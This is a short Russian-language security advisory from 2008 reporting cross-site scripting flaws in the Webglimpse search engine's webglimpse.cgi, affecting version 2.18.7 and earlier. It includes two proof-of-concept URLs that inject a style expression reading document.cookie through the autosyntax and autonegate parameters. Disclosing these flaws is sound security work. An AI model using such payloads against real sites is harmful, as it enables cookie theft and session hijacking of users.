Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20878
HistoryNov 19, 2008 - 12:00 a.m.

Cross-Site Scripting vulnerabilities in Webglimpse

2008-11-1900:00:00
vulners.com
8

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в локальной
поисковой системе Webglimpse.

XSS (IE):

Уязвимости в webglimpse.cgi в параметрах autosyntax и autonegate.

http://site/webglimpse.cgi?ID=1&query=12345&autosyntax=%22style%3D%22xss:expression(alert(document.cookie))

http://site/webglimpse.cgi?ID=1&query=12345&autonegate=%22style%3D%22xss:expression(alert(document.cookie))

Уязвимы Webglimpse 2.18.7 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2624/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua